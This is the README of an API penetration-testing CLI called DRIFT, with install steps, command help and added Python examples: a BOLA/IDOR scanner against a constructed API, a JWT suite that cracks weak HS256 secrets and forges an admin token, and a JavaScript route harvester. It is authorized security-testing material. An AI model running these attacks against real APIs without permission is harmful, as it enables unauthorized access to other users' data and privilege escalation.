Authenticated API triage and discovery for penetration testers and researchers
DRIFT is an API security testing CLI built for real-world authenticated testing. It helps you move from a frontend or captured API request to the endpoints that matter, then test them with focused modules for BOLA, version regression, JWT, shadow discovery, and GraphQL.
Most API workflows are fragmented: you discover endpoints in one place, compare responses in another, test authorization in another, then manually stitch everything together in Burp.
DRIFT is built to make that first serious pass faster and cleaner:
- Auth-first workflow — built for real bearer tokens and real API requests
- Low-noise behavior — target-fit gating, catch-all detection, and confidence-aware findings
- Focused modules — BOLA, version regression, JWT, shadow endpoint discovery, and GraphQL
- Manual-review friendly — proxy support for Burp so every lead can be inspected and replayed
- Fingerprinting: fast recon to decide what kind of target you are dealing with
- BOLA / IDOR: object-level fuzzing across multiple ID formats, with optional cross-user comparison
- Version Regression: checks for alternate versions and weaker controls
- JWT Analysis: decoding, attack-surface mapping, tampering, and weak-secret checks
- Shadow Discovery: harvests API routes from JS bundles, common specs, and curated API paths
- GraphQL Testing: introspection, field harvesting, batching, alias abuse, and auth checks
- Confidence-Aware Findings: validated, probable, heuristic, and weak findings to reduce overclaiming
- Python 3.8+
- pip
- Git
```bash
git clone https://github.com/bl4ck0wl/drift.git
cd drift
python -m venv venv
# Windows
venv\Scripts\activate
# macOS / Linux
source venv/bin/activate
pip install -r requirements.txt
pip install -e .
drift --help
```
Differential Recon & Inference Fuzzing Tool
Author: bl4ck0wl
Usage:
drift <command> [options]
Commands:
scan Run all DRIFT modules against a target API
bola Deep BOLA/IDOR fuzzing on a specific endpoint
version API version regression discovery and security diff
jwt Full JWT attack suite
shadow Hidden endpoint discovery
graphql GraphQL full attack suite
fingerprint Quick API recon — no attacks, just detection
Global Options:
--no-color Disable ANSI colors
--version Show version and exit
-h, --help Show this help message and exit
scan — Run all DRIFT modules against a target API
-u, --url <url> Target API URL with object ID
-t, --token <token> Auth token (Bearer ...)
-T, --token-b <token> Second token for cross-user BOLA proof
-d, --delay <sec> Delay between requests (default: 0.5)
-p, --proxy <proxy> Proxy URL
-o, --output <file> Output file (.html or .json)
-v, --verbose Verbose output
Example:
drift scan -u https://api.target.com/v2/users/1234 -t "Bearer eyJ..." -T "Bearer eyJ...B" -o report.html
bola — Deep BOLA/IDOR fuzzing on a specific endpoint
-u, --url <url> Endpoint URL containing an object ID
-t, --token <token> Primary auth token
-T, --token-b <token> Second token for cross-user proof
-d, --delay <sec> Delay between requests
-p, --proxy <proxy> Proxy URL
-v, --verbose Show candidate IDs being tested
Example:
drift bola -u https://api.target.com/v2/invoices/INV-9874 -t "Bearer eyJ..." -T "Bearer eyJ...B"
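The cross-user proof and the confidence tiers that the `bola` command reports are easiest to understand by walking through the logic once. The block below is an added example written for this page, not DRIFT's own implementation: it mints neighbour IDs in the seed's own format (numeric, prefixed like `INV-9874`, zero-padded; opaque UUIDs get none), gates on a catch-all probe so a "200 for anything" API is not reported as a wall of findings, records a `validated` finding only when the second token receives the owner's exact object, and downgrades single-token enumeration hits to `probable` or `heuristic` depending on what the body reveals. `FakeApi`, its tokens and its invoice records are constructed stand-ins for a target, and the `/v2/invoices/{id}` ownership gap in it is deliberate.

```python
import re
import uuid
from dataclasses import dataclass


@dataclass
class Finding:
    object_id: str
    confidence: str   # validated | probable | heuristic
    detail: str


class FakeApi:
    """Constructed stand-in for a target (not a real service). /v2/invoices/{id}
    has no ownership check, which is the BOLA; /v2/users/{id} enforces one."""
    TOKENS = {"Bearer tokA": "alice", "Bearer tokB": "bob"}
    INVOICES = {
        "INV-9873": {"id": "INV-9873", "owner": "alice", "total": 120},
        "INV-9874": {"id": "INV-9874", "owner": "alice", "total": 80},
        "INV-9875": {"id": "INV-9875", "owner": "bob", "total": 55},
    }
    USERS = {"1234": {"id": "1234", "owner": "alice"}, "1235": {"id": "1235", "owner": "bob"}}

    def get(self, path, token):
        user = self.TOKENS.get(token)
        if user is None:
            return 401, {"error": "unauthenticated"}
        m = re.fullmatch(r"/v2/(invoices|users)/([^/]+)", path)
        if not m:
            return 404, {"error": "not found"}
        store = self.INVOICES if m.group(1) == "invoices" else self.USERS
        obj = store.get(m.group(2))
        if obj is None:
            return 404, {"error": "not found"}
        if m.group(1) == "users" and obj["owner"] != user:
            return 403, {"error": "forbidden"}
        return 200, obj


def candidate_ids(seed, span=3):
    """Neighbouring IDs in the seed's own format; opaque IDs get none."""
    try:
        uuid.UUID(seed)
        return []                       # random UUIDs: enumeration is the wrong attack
    except ValueError:
        pass
    m = re.fullmatch(r"(.*?)(\d+)(\D*)", seed)
    if not m:
        return []
    prefix, digits, suffix = m.groups()
    base, width = int(digits), len(digits)
    out = []
    for delta in range(-span, span + 1):
        if delta != 0 and base + delta >= 0:
            out.append(f"{prefix}{base + delta:0{width}d}{suffix}")
    return out


def bola_scan(api, path, token_a, token_b=None, span=3):
    """Differential BOLA check on one object URL; findings are graded by confidence."""
    base, seed = path.rsplit("/", 1)
    status, baseline = api.get(path, token_a)
    if status != 200:
        return []                       # no working baseline, nothing to compare against
    # Catch-all gate: if a nonsense ID also returns 200, every hit below would be
    # noise, so stop here rather than overclaim.
    probe_status, _ = api.get(f"{base}/{uuid.uuid4().hex}", token_a)
    if probe_status == 200:
        return []
    findings = []
    # Cross-user proof: the second user reading the first user's own object.
    if token_b:
        status_b, body_b = api.get(path, token_b)
        if status_b == 200 and body_b == baseline:
            findings.append(Finding(seed, "validated",
                                    "second user received the same object as the owner"))
    # Single-token enumeration: weaker evidence, graded by what the body reveals.
    own = baseline.get("owner")
    for cand in candidate_ids(seed, span):
        status, body = api.get(f"{base}/{cand}", token_a)
        if status != 200:
            continue
        owner = body.get("owner")
        if owner is not None and owner == own:
            continue                    # the caller's own object is not a finding
        if owner is not None:
            findings.append(Finding(cand, "probable", f"object owned by '{owner}' is readable"))
        else:
            findings.append(Finding(cand, "heuristic", "readable, ownership unknown"))
    return findings


if __name__ == "__main__":
    for f in bola_scan(FakeApi(), "/v2/invoices/INV-9874", "Bearer tokA", "Bearer tokB"):
        print(f"[{f.confidence}] {f.object_id}: {f.detail}")
```

Against the constructed API the invoice endpoint yields one `validated` finding (token B reads `INV-9874`) and one `probable` finding (`INV-9875`, owned by someone else), while the user endpoint yields nothing because the 403 blocks both paths. Real targets rarely expose an `owner` field this cleanly; the grading then falls through to `heuristic`, which is exactly the case to replay through Burp before writing it up.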
version — API version regression discovery and security diff
-u, --url <url> Target API URL
-t, --token <token> Auth token
-d, --delay <sec> Request delay
-p, --proxy <proxy> Proxy URL
-v, --verbose Show every version being probed
Example:
drift version -u https://api.target.com/v2/admin/users -t "Bearer eyJ..."
jwt — Full JWT attack suite
-t, --token <jwt> JWT token to analyze
-u, --url <url> Target URL to replay forged tokens against
-p, --proxy <proxy> Proxy URL
-v, --verbose Show each attack being attempted
Example:
drift jwt -t "eyJhbGciOiJSUzI1NiJ9..." -u https://api.target.com/v2/admin
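The four things the `jwt` module lists (decoding, attack-surface mapping, tampering, weak-secret checks) fit in a short stand-alone script. The block below is an added example for this page, not DRIFT's source: it decodes a compact JWS without verifying it, turns header and claim properties into a list of attack classes worth attempting, brute-forces an HS256 secret from a wordlist, and, if a secret is recovered, re-signs the token with an escalated `role` claim. `SAMPLE_TOKEN`, its secret and `SAMPLE_WORDLIST` are constructed for the demonstration; the lead wording is this example's own.

```python
import base64
import hashlib
import hmac
import json
import time


def b64url_decode(segment):
    """base64url without padding, as JWS uses it."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_jwt(token):
    """Split a compact JWS into header, claims, signing input and raw signature.
    Nothing is verified here; that is deliberate for the analysis step."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected 3 dot-separated segments")
    return {
        "header": json.loads(b64url_decode(parts[0])),
        "payload": json.loads(b64url_decode(parts[1])),
        "signing_input": f"{parts[0]}.{parts[1]}".encode("ascii"),
        "signature": b64url_decode(parts[2]),
    }


def map_attack_surface(decoded, now=None):
    """List the attack classes worth trying, based only on header and claims."""
    now = time.time() if now is None else now
    hdr, claims = decoded["header"], decoded["payload"]
    alg = str(hdr.get("alg", ""))
    leads = []
    if alg.lower() == "none":
        leads.append("alg=none: server may accept unsigned tokens")
    elif alg.startswith("HS"):
        leads.append(f"{alg}: shared secret, weak-secret brute force applies")
    elif alg.startswith(("RS", "PS", "ES")):
        leads.append(f"{alg}: try algorithm confusion (re-sign as HS256 with the public key)")
    if "kid" in hdr:
        leads.append("kid header: try path traversal or injection in the key lookup")
    if "jku" in hdr or "x5u" in hdr:
        leads.append("jku/x5u header: try pointing the key URL at a host you control")
    if "exp" not in claims:
        leads.append("no exp claim: a leaked token never expires")
    elif claims["exp"] < now:
        leads.append("expired token: check whether the API still honours it")
    for claim in ("role", "admin", "is_admin", "scope", "groups"):
        if claim in claims:
            leads.append(f"privilege claim '{claim}': tamper once a forge path exists")
    return leads


def crack_hs256(decoded, wordlist):
    """Return the candidate secret that reproduces the signature, or None."""
    for secret in wordlist:
        mac = hmac.new(secret.encode(), decoded["signing_input"], hashlib.sha256).digest()
        if hmac.compare_digest(mac, decoded["signature"]):
            return secret
    return None


def mint_hs256(claims, secret, header=None):
    """Sign claims with HS256; used both to build the sample and to forge."""
    header = header or {"alg": "HS256", "typ": "JWT"}
    seg = lambda obj: b64url_encode(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = f"{seg(header)}.{seg(claims)}"
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


# Constructed sample: a token the target supposedly issued with a guessable secret.
SAMPLE_TOKEN = mint_hs256({"sub": "1234", "role": "user", "exp": 1700000000}, "secret123")
SAMPLE_WORDLIST = ["password", "secret", "changeme", "secret123", "jwtsecret"]


def run_suite(token, wordlist, now=None):
    """Decode, map the surface, and for HS* tokens attempt recovery and a forge."""
    decoded = decode_jwt(token)
    result = {"claims": decoded["payload"], "leads": map_attack_surface(decoded, now)}
    if str(decoded["header"].get("alg", "")).startswith("HS"):
        secret = crack_hs256(decoded, wordlist)
        result["secret"] = secret
        if secret is not None:
            forged_claims = dict(decoded["payload"], role="admin")
            result["forged"] = mint_hs256(forged_claims, secret, decoded["header"])
    return result


if __name__ == "__main__":
    report = run_suite(SAMPLE_TOKEN, SAMPLE_WORDLIST)
    for lead in report["leads"]:
        print("-", lead)
    print("secret:", report.get("secret"), "forged:", report.get("forged"))
```

The forged token is only a lead until it is replayed against the target (the `-u` option in the help text above exists for that reason); a recovered secret proves the signing key is weak, and the 200 on an admin route proves the API trusts it.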
shadow — Hidden endpoint discovery
-u, --url <url> Frontend app URL
-t, --token <token> Auth token
-p, --proxy <proxy> Proxy URL
-v, --verbose Show every path being probed
Example:
drift shadow -u https://app.target.com -t "Bearer eyJ..."
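The harvesting side of shadow discovery is mostly pattern work over downloaded JavaScript. The block below is an added example, not DRIFT's harvester: it pulls route-looking paths out of string and template literals, normalises `${param}` segments to a placeholder, discards static assets, records any separate API origin the bundle names, and crosses the result with a list of common spec locations to produce the URL set a probe would walk. `SAMPLE_BUNDLE` is a constructed bundle fragment and `COMMON_SPECS` is this example's own list, not the curated paths DRIFT ships.

```python
import re
from urllib.parse import urljoin, urlparse

# Constructed fragment standing in for a downloaded frontend bundle chunk.
SAMPLE_BUNDLE = r'''
const API = "https://api.target.com";
fetch(`${API}/v2/users/${id}/invoices`, {headers});
axios.get("/v2/admin/export?format=csv");
const LEGACY = '/v1/internal/debug';
client.post("/graphql", {query});
const logo = "/static/logo.png";
const dl = "/v2/reports/" + reportId + "/download";
'''

# Spec and well-known locations worth checking on every target (assumed list).
COMMON_SPECS = ["/openapi.json", "/swagger.json", "/swagger/v1/swagger.json",
                "/v2/api-docs", "/api-docs", "/graphql", "/.well-known/openid-configuration"]

LITERAL_RE = re.compile(r'''"([^"\n]*)"|'([^'\n]*)'|`([^`]*)`''')
HOST_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?")
TEMPLATE_RE = re.compile(r"\$\{[^}]*\}")              # ${id} inside template literals
PATH_RE = re.compile(r"/(?:[A-Za-z0-9_\-.{}]+/?)+")   # /seg/seg/{id}/...
STATIC_EXT = (".png", ".jpg", ".svg", ".css", ".js", ".woff", ".woff2", ".ico", ".map")


def harvest_paths(js):
    """Pull route-looking paths out of string and template literals."""
    found = set()
    for groups in LITERAL_RE.findall(js):
        lit = next((g for g in groups if g), "")
        if lit.startswith(("http://", "https://")):
            lit = urlparse(lit).path               # keep only the path of absolute URLs
        lit = TEMPLATE_RE.sub("{id}", lit)         # normalise ${param} to a placeholder
        for m in PATH_RE.finditer(lit):
            path = m.group(0).rstrip("/")
            if not path or path.lower().endswith(STATIC_EXT):
                continue
            found.add(path)
    return sorted(found)


def harvest_hosts(js):
    """API origins named in the bundle (often a separate api.* host)."""
    return sorted(set(HOST_RE.findall(js)))


def build_candidates(frontend_url, js):
    """Cross every harvested path plus the spec paths with every known origin."""
    origins = [frontend_url] + harvest_hosts(js)
    paths = harvest_paths(js) + COMMON_SPECS
    return sorted({urljoin(origin, path) for origin in origins for path in paths})


if __name__ == "__main__":
    for url in build_candidates("https://app.target.com", SAMPLE_BUNDLE):
        print(url)
```

Concatenated paths (`"/v2/reports/" + reportId + "/download"`) surface as fragments rather than one route, and `{id}` placeholders still need a real identifier before probing; both are normal for this kind of harvest and are why the results are a lead list to review, not findings.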
graphql — GraphQL full attack suite
-u, --url <url> GraphQL endpoint URL
-t, --token <token> Auth token
-p, --proxy <proxy> Proxy URL
-v, --verbose Show every query being sent
Example:
drift graphql -u https://api.target.com/graphql -t "Bearer eyJ..."
fingerprint — Quick API recon — no attacks, just detection
-u, --url <url> Target URL
-t, --token <token> Auth token for deeper fingerprinting
Example:
drift fingerprint -u https://api.target.com/v2/users/me -t "Bearer eyJ..."
Authorized use only. You must have explicit permission before scanning or probing any target.
1) Fingerprint the target first (no attacks, just detection)
drift fingerprint -u https://api.target.com/v2/users/me -t "Bearer eyJ..."
2) Run all modules and write a report
drift scan -u https://api.target.com/v2/users/1234 -t "Bearer eyJ..." -o report.html
3) Prove a BOLA with a second account
drift bola -u https://api.target.com/v2/invoices/INV-9874 -t "Bearer eyJ...ACCOUNT_A..." -T "Bearer eyJ...ACCOUNT_B..."
4) Discover hidden API routes from the frontend
drift shadow -u https://app.target.com -t "Bearer eyJ..."
5) Route every request through Burp for manual review
drift scan -u https://api.target.com/v2/users/1234 -t "Bearer eyJ..." --proxy http://127.0.0.1:8080

MIT License — see LICENSE.
DRIFT is intended for:
- penetration testing with written permission
- bug bounty programs within published scope
- internal application security testing
- research in controlled environments
Always obtain authorization and follow applicable laws and platform rules.
